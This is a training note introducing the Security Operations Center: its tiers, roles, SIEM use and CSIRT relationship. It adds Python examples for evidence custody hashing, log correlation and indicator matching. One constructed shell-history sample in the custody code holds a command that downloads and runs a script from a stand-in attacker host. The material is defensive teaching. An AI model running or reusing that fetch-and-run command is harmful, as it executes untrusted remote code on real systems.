Topic: Become a SOC Analyst
Date: 31.03.22
Day: 01
Today we cover:
Introduction to SOC
SOC Types and Roles
SOC Analysts and Their Responsibilities
SIEM and Analyst Relationship
Table of contents:
Introduction to SOC
What Is a Security Operations Center (SOC)?
What is the importance of a SOC?
What does a SOC do?
What does a SOC do when it’s not detecting threats?
Who works in a SOC?
What are best practices for building a SOC?
Security information and event management (SIEM)
What services are included in a SIEM application?
Automated application security
Asset discovery system
Vulnerability scanners and penetration testing
Ethical hacking
Reverse engineering
Consider all your options
How can SIEM improve your SOC?
What is a SOC team?
Key roles on a SOC team.
SOC roles and responsibilities.
SOC Team vs. CSIRT – What is the Difference?
Best Practices for Building a Winning SOC Team.
Measuring SOC Teams
Conclusion
Reference
Introduction: A Security Operations Center (SOC) is a centralized function within an organization employing people, processes, and technology to continuously monitor and improve an organization's security posture while preventing, detecting, analyzing, and responding to cybersecurity incidents.
A SOC acts like the hub or central command post, taking in telemetry from across an organization's IT infrastructure, including its networks, devices, appliances, and information stores, wherever those assets reside. The proliferation of advanced threats places a premium on collecting context from diverse sources. Essentially, the SOC is the correlation point for every event logged within the organization that is being monitored. For each of these events, the SOC must decide how they will be managed and acted upon.
What Is a Security Operations Center (SOC)?
A security operations center (SOC), also called an information security operations center (ISOC), is a centralized location where an information security team monitors, detects, analyzes and responds to cybersecurity incidents, typically on a 24/7/365 basis.
The security team, which consists of both security analysts and engineers, oversees all activity on servers, databases, networks, applications, endpoint devices, websites and other systems for the sole purpose of pinpointing potential security threats and thwarting them as quickly as possible. They also monitor relevant external sources (such as threat lists) that may affect the organization’s security posture.
A SOC must not only identify threats, but analyze them, investigate the source, report on any vulnerabilities discovered and plan how to prevent similar occurrences in the future. In other words, they’re dealing with security problems in real time, while continually seeking ways to improve the organization’s security posture.
On a larger scale, there are also Global Security Operations Centers (GSOC), coordinating security offices that literally span the globe. If you have offices around the world, a GSOC (rather than establishing a SOC for each international location) can prevent each location from repeating tasks and functions, reduce overhead and ensure that the security team has a big-picture view of what’s happening across the entire organization.
Below, we’ll cover the basic functions of a SOC or GSOC, in addition to key aspects of establishing a SOC.
What is the importance of a SOC?
Cyber attacks are increasingly damaging to organizations. In 2018, billions of people were affected by data breaches and cyber attacks, and consumer confidence in organizations’ ability to protect their privacy and personal information continued to erode. Nearly 70 percent of consumers believe organizations are vulnerable to hacking and cyber attacks, and say they are less likely to continue or start doing business with organizations that have been compromised.
Simply put, a SOC exists so that threats are detected and dealt with as they happen rather than discovered months later. Looking at the big picture, SOCs can:
Respond faster: The SOC provides a centralized, complete, real-time view of how the entire infrastructure is performing from a security standpoint, even if you have several locations and thousands of endpoints. You can detect, identify, prevent and resolve issues before they cause too much trouble for the business.
Protect consumer and customer trust: Consumers are already skeptical of most companies and are worried about their privacy. Creating a SOC to protect consumer and customer data can help build trust in your organization. And of course, preventing breaches protects that trust.
Minimize costs: While many organizations think establishing a SOC is cost prohibitive, the costs of a breach, including lost or corrupted data, recovery effort and customer defection, are much higher. Additionally, SOC personnel will ensure that you’re using the right tools for your business to their full potential, so you won’t waste money on ineffective tools.
These benefits are hard to put a price on because they quite literally keep your business running. But do you absolutely need a SOC? If you’re subject to government or industry regulations, have suffered a security breach or are in the business of storing sensitive data — like customer information — the answer is yes.
What does a SOC do?
The SOC leads real-time incident response and drives ongoing security improvements to protect the organization from cyber threats. By using a complex combination of the right tools and the right people to monitor and manage the entire network, a high-functioning SOC will provide:
Proactive, around-the-clock surveillance of networks, hardware and software for threat and breach detection, and incident response.
Expertise on all the tools your organization uses, including third-party vendors, to ensure they can easily resolve security issues.
Installation, updating and troubleshooting of application software.
Monitoring and managing of firewall and intrusion prevention systems.
Running antivirus and anti-malware scanning, and remediating the malware and ransomware findings those tools report.
Email, voice and video traffic management.
Patch management and whitelisting.
Deep analysis of security log data from various sources.
Analysis, investigation and documentation of security trends.
Investigation of security breaches to understand the root cause of attacks and prevent future breaches.
Enforcement of security policies and procedures.
Backup, storage and recovery.
The SOC uses a range of tools that collect data from across the network and various devices, monitors for anomalies and alerts staff of potential threats. However, the SOC does more than just handle problems as they pop up.
What does a SOC do when it’s not detecting threats?
The SOC is tasked with finding weaknesses, both outside and within the organization, through ongoing software and hardware vulnerability analysis and by actively gathering threat intelligence on known risks. So even when there are seemingly no active threats (rare, given one widely cited estimate that an attack occurs about every 39 seconds), SOC staff are proactively looking for ways to improve security. Beyond vulnerability assessment, which scans for known weaknesses, this can include penetration testing, where the team actively attempts to break into its own systems to confirm which weaknesses are actually exploitable. Additionally, a core role of SOC personnel is security analysis: ensuring that the organization is using the correct security tools, using them optimally, and assessing what is and isn’t working.
Who works in a SOC?
The SOC is made up of highly skilled security analysts and engineers, along with supervisors who ensure everything is running smoothly. These are professionals trained specifically to monitor and manage security threats. Not only are they skilled in using a variety of security tools, they know specific processes to follow in the event that the infrastructure is breached.
Most SOCs adopt a hierarchical approach to manage security issues, where analysts and engineers are categorized based on their skill set and experience. A typical team might be structured something like this:
Level 1: The first line of incident responders. These security professionals watch for alerts and determine each alert’s urgency as well as when to move it up to Level 2. Level 1 personnel may also manage security tools and run regular reports.
Level 2: These personnel usually have more expertise, so they can quickly get to the root of the problem and assess which part of the infrastructure is under attack. They will follow procedures to remediate the problem and repair any fallout, as well as flag issues for additional investigation.
Level 3: At this level, personnel consist of high-level expert security analysts who are actively searching for vulnerabilities within the network. They will use advanced threat detection tools to diagnose weaknesses and make recommendations for improving the organization’s overall security. Within this group, you might also find specialists, such as forensic investigators, compliance auditors or cybersecurity analysts.
Level 4: This level consists of high-level managers and chief officers with the most years of experience. This group oversees all SOC team activities and is responsible for hiring and training, plus evaluating individual and overall performance. Level 4s step in during crises, and, specifically, serve as the liaison between the SOC team and the rest of the organization. They are also responsible for ensuring compliance with organization, industry and government regulations.
What Is the difference between a SOC and a NOC?
While the SOC is focused on monitoring, detecting and analyzing an organization’s security health 24/7/365, the main objective of the NOC, or network operations center, is to ensure that the network performance and speed are up to par and that downtime is limited.
SOC engineers and analysts search for cyberthreats and attempted attacks, and respond before an organization’s data or systems are compromised. NOC personnel search for any issues that could slow network speed or cause downtime. Both proactively monitor in real-time, with the goal of preventing problems before customers or employees are affected, and search for ways to make continual improvements so that similar issues don’t crop up again.
SOCs and NOCs should collaborate to work through major incidents and resolve crisis situations, and in some cases the SOC functions will be housed within the NOC. NOCs can detect and respond to some security threats, specifically as they pertain to network performance, if the team is properly trained and looking for those threats. A typical SOC wouldn’t have the capability to detect and respond to network performance issues without investing in different tools and skill sets.
What are best practices for building a SOC?
Best practices for running a SOC include: developing a strategy, getting organization-wide visibility, investing in the right tools, hiring and training the right staff, maximizing efficiency and designing your SOC according to your specific needs and risks.
Develop a strategy: A SOC is an important investment; there’s a lot riding on your security planning. To create a strategy that covers your security needs, consider the following:
What do you need to secure? A single on-premises network, or global? Cloud or hybrid? How many endpoints? Are you protecting highly confidential data or consumer information? What data is most valuable, and most likely to be targeted?
Will you merge your SOC with your NOC or create two separate departments? Again, the capabilities are very different, and merging them requires different tools and personnel skills.
Do you need 24/7/365 availability from your SOC staff? This affects staffing, cost and logistics.
Will you build the SOC entirely in-house, or outsource some or all functions to a third-party vendor? A careful cost-benefit analysis will help define the trade-offs.
Make sure you have visibility across your entire organization: It’s imperative that your SOC has access to everything, no matter how small or seemingly insignificant, that could impact security. In addition to the larger infrastructure, that includes device endpoints, systems controlled by third parties and encrypted data.
Invest in the right tools and services: As you think about building your SOC, focus first on the tools. The sheer number of security events will be overwhelming without the right automated tools to deal with the “noise” and subsequently elevate significant threats. Specifically, you need to invest in:
Security information and event management (SIEM):
This single security management system offers full visibility into activity within your network, collecting, parsing and categorizing machine data from a wide range of sources on the network and analyzing that data so you can act on it in real time.
Endpoint protection systems: Every device that connects to your network is a potential point of compromise. Endpoint protection software running on those devices blocks known malware, records what processes and users do, and gives the SOC the host-level view that network telemetry alone cannot provide.
Firewall: It will monitor incoming and outgoing network traffic and automatically block traffic based on security rules you establish.
Automated application security: Automates the testing process across all software and provides the security team with real-time feedback about vulnerabilities.
Asset discovery system: Tracks the active and inactive tools, devices and software being used on your network so you can evaluate risk and address weaknesses.
Data monitoring tool: Allows you to track and evaluate data to ensure its security and integrity.
Governance, risk and compliance (GRC) system: Helps you to ensure you’re compliant with various rules and regulations where and when you need to be.
Vulnerability scanners and penetration testing: Lets your security analysts search for vulnerabilities and find undiscovered weaknesses within your network.
Log management system: Allows you to log all those messages that come from every piece of software, hardware and endpoint device running on your network.
Hire the best and train them well: Hiring talented staff and continually improving their skills is central to success. The market for security talent is competitive. Once you get people hired, continually invest in training to improve their skills; this not only enhances security, it improves engagement and retention. Your team must understand application and network security, firewalls, information assurance, Linux, UNIX, SIEM, and security engineering and architecture. Your highest-level security analysts should possess these skills:
Ethical hacking: You want one of your people actively trying to hack your system to uncover vulnerabilities within your system.
Cyber forensics: Analysts must investigate issues and apply analysis techniques to both understand and preserve evidence from the investigations. If a case were to go to court, the security analyst must be able to provide a documented chain of evidence to show what occurred and why.
Reverse engineering: This is the process of deconstructing software or rebuilding it to understand how it works and, more importantly, where it’s vulnerable to attacks so that the team can take preventive measures.
Intrusion prevention system expertise: Monitoring network traffic for threats would be impossible without tools. Your SOC staff need to know the ins and outs of how to use them properly, including how to tune signatures so the IPS neither floods analysts with false positives nor blocks legitimate traffic.
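The cyber forensics skill above asks for evidence that is preserved and for a documented chain of evidence. The following is an added example, not code from the original page or from any forensic tool, of the mechanism behind that: a SHA-256 digest bound to each artefact at acquisition, a hash-chained custody log so that an altered or removed entry is detectable, and a verification step that re-hashes the artefacts. The artefacts, file names, analyst names and timestamps are constructed for the example.

```python
"""Evidence integrity for a documented chain of custody.

Added example, not code from the original page. Artefacts, names, people
and timestamps below are constructed for illustration.
"""
import hashlib
import json
from datetime import datetime, timezone

# Constructed artefacts as they might be collected from a compromised host.
ARTEFACTS = {
    "auth.log": b"Mar 31 09:00:09 web01 sshd[2101]: Accepted password for root from 203.0.113.7\n",
    "shell_history.txt": b"wget http://cdn.evil.example/x.sh\nbash x.sh\n",
}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def canonical_digest(obj) -> str:
    """Digest of canonical JSON (sorted keys, no whitespace) so that the same
    record always hashes the same way regardless of dict ordering."""
    return sha256_hex(json.dumps(obj, sort_keys=True, separators=(",", ":")).encode())


def acquire(artefacts, acquired_by, acquired_at):
    """Acquisition manifest: one entry per artefact, fixed at collection time."""
    return [
        {"name": name, "size": len(data), "sha256": sha256_hex(data),
         "acquired_by": acquired_by, "acquired_at": acquired_at}
        for name, data in sorted(artefacts.items())
    ]


def append_custody(log, action, actor, at, manifest):
    """Each custody entry commits to the manifest and to the previous entry,
    so editing or removing an earlier entry breaks the chain."""
    prev = log[-1]["entry_sha256"] if log else "0" * 64
    body = {"action": action, "actor": actor, "at": at,
            "manifest_sha256": canonical_digest(manifest), "prev": prev}
    entry = dict(body, entry_sha256=canonical_digest(body))
    log.append(entry)
    return entry


def custody_log_intact(log, manifest):
    """Check every link of the chain and that all entries refer to this manifest."""
    prev = "0" * 64
    expected = canonical_digest(manifest)
    for entry in log:
        body = {k: v for k, v in entry.items() if k != "entry_sha256"}
        if entry["prev"] != prev or entry["manifest_sha256"] != expected:
            return False
        if canonical_digest(body) != entry["entry_sha256"]:
            return False
        prev = entry["entry_sha256"]
    return True


def verify(manifest, artefacts):
    """Re-hash the artefacts now held against the manifest: name -> ok|modified|missing."""
    status = {}
    for entry in manifest:
        data = artefacts.get(entry["name"])
        if data is None:
            status[entry["name"]] = "missing"
        elif sha256_hex(data) != entry["sha256"]:
            status[entry["name"]] = "modified"
        else:
            status[entry["name"]] = "ok"
    return status


if __name__ == "__main__":
    now = datetime.now(timezone.utc).isoformat()
    manifest = acquire(ARTEFACTS, "analyst.a", now)
    log = []
    append_custody(log, "acquired", "analyst.a", now, manifest)
    append_custody(log, "transferred", "analyst.b", now, manifest)
    print("artefacts:", verify(manifest, ARTEFACTS))
    print("custody log intact:", custody_log_intact(log, manifest))
```

The chain detects modification of any entry and removal of an interior entry, but not truncation of the most recent entries; to close that gap the latest entry digest has to be recorded somewhere outside the log (the case ticket, a signed message), which is what a custody form does on paper.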
Consider all your options: The most common types of SOC include:
Internal SOCs, usually with a full-time staff based on-premises. The internal SOC comprises a physical room where all the action takes place.
Virtual SOCs are not on-premises, and are made up of part-time or contracted workers who work together in a coordinated manner to resolve issues as needed. The SOC and the organization set parameters and guidelines for how the relationship will work, and how much support the SOC offers can vary depending on the needs of the organization.
Outsourced SOCs, in which some or all functions are managed by an external managed security service provider (MSSP) that specializes in security analysis and response. Sometimes these companies provide specific services to support an internal SOC, and sometimes they handle everything.
What services are included in a SIEM application?
Because a SIEM gives analysts an overview of activity across the network, it is used wherever large volumes of machine data need to be searched and correlated. Its main home is the SOC, where analysts review alerts and traffic in real time, but the same platform is also used for forensics, log management and general data analysis.
A SIEM can be used for:
Data security
Mobile security
Cloud security
IoT security
Endpoint monitoring and security
Infrastructure security
Application security
Messaging security
Web security
Risk and compliance
Threat intelligence
Specialized threat analysis and prediction
Security operations
Identity and access management
How can SIEM improve your SOC?
SIEM makes the SOC more effective at securing your organization. Top security analysts — even those with the most advanced setups — can’t review the endless stream of data line by line to discover malicious activities, and that’s where SIEM can be a game changer.
As we’ve mentioned, a SIEM collects and organizes all the data coming from various sources within your network and offers your SOC team insights so that they can quickly detect and respond to internal and external attacks, simplify threat management, minimize risk, and gain organization-wide visibility and security intelligence.
SIEM is critical for SOC tasks such as monitoring, incident response, log management, compliance reporting and policy enforcement. Its log management capabilities alone make it a necessary tool for any SOC. A SIEM can search huge volumes of security data coming from thousands of sources in seconds to find unusual behavior and malicious activity and, where it is integrated with response tooling (SOAR, firewalls, endpoint agents), trigger automated containment. Much of that activity goes undetected without a SIEM.
The SIEM helps the SOC pull the logs together and make rules that enable automation and can drastically reduce false alerts. Security analysts are freed up to focus their attention on the real threats. Additionally, the SIEM can offer robust reporting that helps with both forensic investigations and compliance requirements.
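The collecting, parsing and categorizing described under SIEM in the tools list, and the correlation rules that "drastically reduce false alerts" described just above, as a runnable added example. This is not code from the original page or from any SIEM product: it parses constructed sshd syslog lines and a flattened Windows security-log export into one event schema, then applies a correlation rule for a password brute force followed by a successful logon. The threshold and time window are the false-positive controls; one mistyped password followed by a success does not alert. Hostnames, addresses and usernames are invented; Windows event IDs 4624 and 4625 are the real logon success and failure IDs.

```python
"""Miniature SIEM pipeline: parse, normalise, correlate.

Added example, not code from the original page or any vendor product.
The log lines, hosts, IPs and usernames below are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed input: Linux sshd lines and a flattened Windows security-log
# export, interleaved and out of order, as a SIEM receives them.
SAMPLE_LOGS = """\
2022-03-31T09:00:01Z web01 sshd[2101]: Failed password for invalid user admin from 203.0.113.7 port 51122 ssh2
2022-03-31T09:00:03Z web01 sshd[2101]: Failed password for root from 203.0.113.7 port 51123 ssh2
2022-03-31T09:00:05Z web01 sshd[2101]: Failed password for root from 203.0.113.7 port 51124 ssh2
2022-03-31T09:00:09Z web01 sshd[2101]: Accepted password for root from 203.0.113.7 port 51130 ssh2
2022-03-31T09:01:00Z web01 sshd[2102]: Failed password for alice from 198.51.100.20 port 40000 ssh2
2022-03-31T09:02:00Z dc01 EventID=4625 TargetUserName=bob IpAddress=203.0.113.7
2022-03-31T09:02:02Z dc01 EventID=4625 TargetUserName=bob IpAddress=203.0.113.7
2022-03-31T09:02:04Z dc01 EventID=4625 TargetUserName=bob IpAddress=203.0.113.7
2022-03-31T09:02:30Z dc01 EventID=4624 TargetUserName=bob IpAddress=203.0.113.7
2022-03-31T09:10:00Z web01 sshd[2103]: Accepted publickey for alice from 198.51.100.20 port 40001 ssh2
2022-03-31T09:11:00Z fw01 kernel: a line neither parser understands
"""

SSHD_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) \S+ for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)
WINLOGON_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) EventID=(?P<eid>\d+) "
    r"TargetUserName=(?P<user>\S+) IpAddress=(?P<src>\S+)"
)
WIN_LOGON_EVENTS = {"4624": "success", "4625": "failure"}  # real Windows IDs


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def parse_events(text):
    """Normalise raw lines into one schema.

    Lines no parser understands are returned, not silently dropped: a
    source that stops parsing is a visibility gap the SOC has to notice.
    """
    events, unparsed = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = SSHD_RE.match(line)
        if m:
            events.append({
                "ts": _ts(m["ts"]), "host": m["host"], "user": m["user"],
                "src_ip": m["src"], "source": "sshd",
                "outcome": "failure" if m["outcome"] == "Failed" else "success",
            })
            continue
        m = WINLOGON_RE.match(line)
        if m and m["eid"] in WIN_LOGON_EVENTS:
            events.append({
                "ts": _ts(m["ts"]), "host": m["host"], "user": m["user"],
                "src_ip": m["src"], "source": "windows",
                "outcome": WIN_LOGON_EVENTS[m["eid"]],
            })
            continue
        unparsed.append(line)
    return events, unparsed


def brute_force_then_success(events, threshold=3, window=timedelta(minutes=5)):
    """Correlation rule: at least `threshold` failed logons from one source IP
    within `window`, followed by a successful logon from that IP.

    Threshold and window are the false-positive controls: one failure
    followed by a success is a mistyped password, not an intrusion.
    """
    failures = defaultdict(list)  # src_ip -> timestamps of failures
    alerts = []
    for e in sorted(events, key=lambda ev: ev["ts"]):
        src = e["src_ip"]
        if e["outcome"] == "failure":
            failures[src].append(e["ts"])
            continue
        recent = [t for t in failures[src] if e["ts"] - t <= window]
        if len(recent) >= threshold:
            alerts.append({
                "rule": "brute_force_then_success",
                "src_ip": src, "host": e["host"], "user": e["user"],
                "source": e["source"], "failures": len(recent),
                "first_failure": min(recent), "success_at": e["ts"],
            })
        failures[src] = []  # a success closes the sequence for that source
    return alerts


if __name__ == "__main__":
    evts, skipped = parse_events(SAMPLE_LOGS)
    for a in brute_force_then_success(evts):
        print(f"ALERT {a['rule']}: {a['src_ip']} -> {a['host']} as {a['user']} "
              f"after {a['failures']} failures ({a['source']})")
    print(f"{len(evts)} events parsed, {len(skipped)} lines not understood")
```

Run as-is it raises two alerts, both for 203.0.113.7 (root on web01 over ssh, then bob on dc01 via Windows logon), and none for alice, whose single failure is followed by a success outside the window. Keying the rule on source IP rather than on user is what lets it join the two sources into one story.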
Security Operations Center Roles and Responsibilities
In simple terms, the role of the SOC is to protect the IT infrastructure and the data on it. Achieving that is a lot easier to say than to do, and in order to achieve it we need to first consider the role of the SOC in more detail, then the people in the SOC and finally the processes and procedures that are needed for a SOC to function properly.
As we will discuss later, the exact roles and responsibilities will be determined by the size of the organization involved. However, most SOCs hold the following key responsibilities
What is a SOC team?
A security operations center — commonly referred to as a SOC — is a team that continuously monitors and analyzes the security procedures of an organization. It also defends against security breaches and actively isolates and mitigates security risks.
There are five key roles on a SOC team:
01. Security analysts are cybersecurity first responders. They report on cyberthreats and implement any changes needed to protect the organization. They’re considered the last line of defense against cybersecurity threats, work alongside security managers and cybersecurity engineers, and usually report to the CISO.
02. Security engineers are usually software or hardware specialists and are in charge of maintaining and updating tools and systems. They are also responsible for any documentation that other team members might need, such as digital security protocols.
03. The SOC manager is responsible for the SOC team. They direct SOC operations and are responsible for syncing between analysts and engineers; hiring; training; and creating and executing cybersecurity strategy. They also direct and orchestrate the company’s response to major security threats.
04. The chief information security officer (CISO) is a leadership position responsible for establishing security-related strategies, policies, and operations. They work closely with the CEO and inform and report to management on security issues.
05. The director of incident response (IR) is a role in larger security organizations that is responsible for managing incidents as they occur, and communicating security requirements to the organization in the case of a significant data breach.
SOC roles and responsibilities
SOC analysts are organized into four tiers. First, SIEM alerts flow to Tier 1 analysts who monitor, prioritize and investigate them. Real threats are passed to a Tier 2 analyst with deeper security experience, who conducts further analysis and decides on a strategy for containment.
Critical breaches are moved up to a Tier 3 senior analyst, who manages the incident and is responsible for actively hunting for threats continuously. The Tier 4 analyst is the SOC manager, responsible for recruitment, strategy, priorities, and the direct management of SOC staff when major security incidents occur.
Figure: SOC roles and responsibilities
The table below explains each SOC role in more detail.
SOC Team vs. CSIRT – What is the Difference?
A computer security incident response team (CSIRT), also called CERT or CIRT, is responsible for receiving, analyzing, and responding to security incidents. CSIRTs can work under SOCs or can stand alone.
What differentiates a CSIRT from a SOC?
While the core function of a CSIRT is to minimize and manage damage caused by an incident, the CSIRT does not just deal with the attack itself; they also communicate with clients, executives, and the board.
How to determine whether you need a SOC team, CSIRT, or both?
The case for a single entity
Often, it’s desirable to have a single entity that unites the SOC and CSIRT. Why? Because the distinction between detection and response is not clear cut, and may even become irrelevant. For example, threat hunting is used to identify threats, but also operates as a method of response.
Both SOC teams and CSIRTs use security orchestration, automation and response (SOAR) tools, which could indicate that these teams need to be merged, as it is not always clear who owns the tool and is accountable for its evolution. Threat intelligence (TI) related activities also provide a case for having a single entity. A single TI consumption position can offer insights into identification and response methods.
Another reason to unite these groups is related to managing the workforce. One problem with SOCs is that it is difficult to keep Tier 1 analysts motivated, particularly when they work nights and weekends. By bringing incident response and threat hunting together, you create the option for job rotation.
The case for separate entities
Some industry experts argue that keeping SOC teams and CSIRT separate allows them to concentrate on their core objectives, namely detection vs. response. Also, occasionally multiple SOCs are required because of multiple regional offices or subsidiaries, yet organizations wish to keep incident response centralized due to the sensitivity of investigation results.
Strategic plans for outsourcing may demand the separation of these two functions. Today, this may not be an issue, as many SOCs operate as hybrid organizations. However, keeping SOC and CSIRT separate may help an organization clearly define the responsibilities of a partner.
Best Practices for Building a Winning SOC Team
Security operations teams face many challenges: they can be overworked, understaffed, and often gain little attention from upper management. Security operations best practices can give companies the tools they need to protect themselves and offer SOC teams a better working environment.
Efficient SOCs use security automation – By pairing highly skilled security analysts with security automation, organizations can analyze more security events, identify more incidents, and protect against those incidents more effectively.
Use effective technology – The abilities of your SOC depend on its technology capabilities. Technology should collect and aggregate data, prevent threats, and respond as threats occur. A team equipped with tools and data sources that keep false positives to a minimum can maximize the time analysts spend investigating real security incidents.
Be up to date with current threat intelligence – Threat intelligence data from within the organization, in conjunction with information from external sources, provides insight into vulnerabilities and threats to the SOC team. External cyber intelligence includes signature updates, news feeds, incident reports, vulnerability alerts, and threat briefs. SOC staff can leverage SOC monitoring tools that provide integrated threat intelligence.
People and responsibilities – Organizations often share administrative duties across subsidiaries, and between partner organizations and business units. The organization’s security policy standards should be used to define responsibilities in relation to tasks and accountability for response. An organization can also define the role of each business unit or agency in relation to the SOC.
Defend the perimeter – A key responsibility of a SOC team is to defend the perimeter, but what information are analysts required to gather? Where can they find that information?
The SOC team can take into account all data input, for example:
Network information, such as URLs, hashes, and connection details
Endpoint monitoring data, vulnerability information reported by scanners, security intelligence feeds, and alerts from intrusion prevention (IPS) and intrusion detection (IDS) systems
Operating systems
Topology information
External-facing firewall and antivirus
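The data inputs listed above (URLs, hashes, connection details, intelligence feeds) are what a SOC matches against threat intelligence. The following is an added example, not code from the original page or from any product, of that matching done type-aware rather than as string comparison: IP addresses against single-address and CIDR indicators, URL hosts against domain indicators on a label boundary (so notevil.example does not match evil.example), and file hashes case-insensitively. The indicator feed, records, addresses, domains and hashes are all constructed for the example; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges and .example is a reserved TLD.

```python
"""Indicator matching over SOC data inputs.

Added example, not code from the original page. The feed and the records
below are constructed; the hash is not a real sample.
"""
import ipaddress
from urllib.parse import urlsplit

# Constructed indicator feed, grouped by indicator type.
IOC_FEED = {
    "ip": ["203.0.113.7"],
    "cidr": ["198.51.100.0/24"],
    "domain": ["evil.example"],
    "sha256": ["0f1e2d3c4b5a69780f1e2d3c4b5a69780f1e2d3c4b5a69780f1e2d3c4b5a6978"],
}

# Constructed records as a SIEM receives them: proxy connections with URLs,
# firewall connection details, and an EDR file-hash observation.
SAMPLE_RECORDS = [
    {"id": 1, "src_ip": "10.0.0.5", "dst_ip": "203.0.113.7", "url": "http://cdn.evil.example/x.js"},
    {"id": 2, "src_ip": "10.0.0.6", "dst_ip": "198.51.100.44"},
    {"id": 3, "src_ip": "10.0.0.7", "url": "https://notevil.example/login"},
    {"id": 4, "host": "ws12", "sha256": "0F1E2D3C4B5A69780F1E2D3C4B5A69780F1E2D3C4B5A69780F1E2D3C4B5A6978"},
    {"id": 5, "src_ip": "10.0.0.8", "dst_ip": "not-an-ip", "url": "https://www.example.org/"},
]


def compile_feed(feed):
    """Parse the feed once into typed objects so matching is type-aware."""
    return {
        "ip": {ipaddress.ip_address(i) for i in feed["ip"]},
        "cidr": [ipaddress.ip_network(c, strict=False) for c in feed["cidr"]],
        "domain": {d.lower().rstrip(".") for d in feed["domain"]},
        "sha256": {h.lower() for h in feed["sha256"]},
    }


def _domain_hits(host, bad_domains):
    """Suffix match on a label boundary: cdn.evil.example hits evil.example,
    notevil.example does not (a plain endswith() would flag it)."""
    host = host.lower().rstrip(".")
    return [d for d in bad_domains if host == d or host.endswith("." + d)]


def match_record(record, feed):
    """Return [(indicator_type, indicator), ...] for one record."""
    hits = []
    for field in ("src_ip", "dst_ip"):
        if field not in record:
            continue
        try:
            addr = ipaddress.ip_address(record[field])
        except ValueError:
            continue  # malformed field: one bad record must not abort the batch
        if addr in feed["ip"]:
            hits.append(("ip", str(addr)))
        hits.extend(("cidr", str(net)) for net in feed["cidr"] if addr in net)
    if "url" in record:
        host = urlsplit(record["url"]).hostname or ""
        hits.extend(("domain", d) for d in _domain_hits(host, feed["domain"]))
    if "sha256" in record and record["sha256"].lower() in feed["sha256"]:
        hits.append(("sha256", record["sha256"].lower()))
    return hits


def enrich(records, raw_feed):
    """Attach hits to every record that matched at least one indicator."""
    feed = compile_feed(raw_feed)
    out = []
    for r in records:
        hits = match_record(r, feed)
        if hits:
            out.append({**r, "hits": hits})
    return out


if __name__ == "__main__":
    for r in enrich(SAMPLE_RECORDS, IOC_FEED):
        print(r["id"], r["hits"])
```

Records 1, 2 and 4 match; record 3 is the suffix trap and record 5 has a malformed address that is skipped rather than crashing the run. In practice each indicator would also carry a confidence and an expiry, and a hit on a stale or low-confidence indicator would be weighted down rather than treated as an alert on its own.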
Measuring SOC Teams
Organizations need to measure the performance of SOC teams to continuously improve their processes. Here are a few important metrics that can help demonstrate the scale of activity in the SOC, and how effectively analysts are handling the workload.
Conclusion: A SOC is the organization's central point for collecting telemetry, detecting and analyzing threats, and coordinating response. It is staffed in tiers, from first-line alert triage up to senior analysts, engineers and the SOC manager, and built on a SIEM that gathers, normalizes and correlates logs from across the estate. Whether it runs in-house, virtually or through an MSSP, and whether incident response sits inside it or in a separate CSIRT, its effectiveness rests on visibility across the whole environment, the right tooling, trained people and measured processes. Note that the term is overloaded: a "SOC report" (SOC 1, SOC 2) is an AICPA service-organization controls attestation produced by CPA firms, a different subject from the Security Operations Center covered in these notes.
Reference:
[1] Splunk, <https://www.splunk.com/en_us/data-insider/what-is-a-security-operations-center.html>, last accessed 31/03/2022
[2] McAfee, <https://www.mcafee.com/enterprise/en-us/security-awareness/operations/what-is-soc.html>, last accessed 31/03/2022
[3] Exabeam, <https://www.exabeam.com/security-operations-center/security-operations-center-roles-and-responsibilities/>, last accessed 31/03/2022
